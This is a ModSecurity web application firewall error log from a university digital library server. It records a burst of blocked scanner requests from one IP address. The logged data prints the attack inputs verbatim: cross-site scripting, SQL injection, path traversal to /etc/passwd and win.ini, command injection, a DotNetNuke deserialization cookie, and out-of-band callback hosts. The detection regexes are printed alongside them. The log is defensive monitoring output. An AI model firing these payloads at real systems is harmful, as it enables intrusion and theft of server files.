[Tue Aug 29 11:42:24.376635 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdhHz4AAAAB"]
[Tue Aug 29 11:42:25.444300 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAcoNicAAAAF"]
[Tue Aug 29 11:42:26.441280 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAbo-ckAAAAi"]
[Tue Aug 29 11:42:27.355417 2023] [:error] [pid 1900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdsFgwAAAAo"]
[Tue Aug 29 11:42:27.441286 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAc92yIAAAAD"]
[Tue Aug 29 11:42:28.415799 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdOeQ8AAAAS"]
[Tue Aug 29 11:42:29.692456 2023] [:error] [pid 1924] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAeEDu8AAAAy"]
[Tue Aug 29 11:42:32.421483 2023] [:error] [pid 1911] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g9s6eeb6hunq6e.oast.site found within TX:1: cjmnbitjmimt14dgn26g9s6eeb6hunq6e.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAd3rG8AAAAe"]
[Tue Aug 29 11:42:32.440337 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "digilib.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAdKXPoAAAAK"]
[Tue Aug 29 11:42:33.391931 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OcCo-f0AAAdKXPsAAAAK"]
[Tue Aug 29 11:42:34.422768 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAdi9-cAAAAk"]
[Tue Aug 29 11:42:40.396645 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAdQ3hUAAAAV"]
[Tue Aug 29 11:42:40.405119 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAeX1AUAAAAK"]
[Tue Aug 29 11:42:41.436517 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAQSW2IAAAA0"]
[Tue Aug 29 11:42:42.397372 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAdV7c8AAAAa"]
[Tue Aug 29 11:42:43.407030 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAeAW7QAAAAu"]
[Tue Aug 29 11:42:46.364044 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAdV7dUAAAAa"]
[Tue Aug 29 11:42:46.541715 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAeX1BYAAAAK"]
[Tue Aug 29 11:42:47.413140 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13R8Co-f0AAAc92zoAAAAD"]
[Tue Aug 29 11:42:47.414485 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAeB1o0AAAAv"]
[Tue Aug 29 11:42:48.392230 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAeX1BoAAAAK"]
[Tue Aug 29 11:42:48.400294 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAdTBBsAAAAY"]
[Tue Aug 29 11:42:48.506476 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26gguchhwezx5mxh.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAd@4AUAAAAs"]
[Tue Aug 29 11:42:50.380543 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAdUc3QAAAAZ"]
[Tue Aug 29 11:42:51.360243 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAd9UNAAAAAr"]
[Tue Aug 29 11:42:51.384636 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAARpg2sAAAAU"]
[Tue Aug 29 11:42:52.373694 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAdOeTEAAAAS"]
[Tue Aug 29 11:42:53.356540 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAQSW3AAAAA0"]
[Tue Aug 29 11:42:53.388496 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAbo-fAAAAAi"]
[Tue Aug 29 11:42:54.384798 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAdUc3oAAAAZ"]
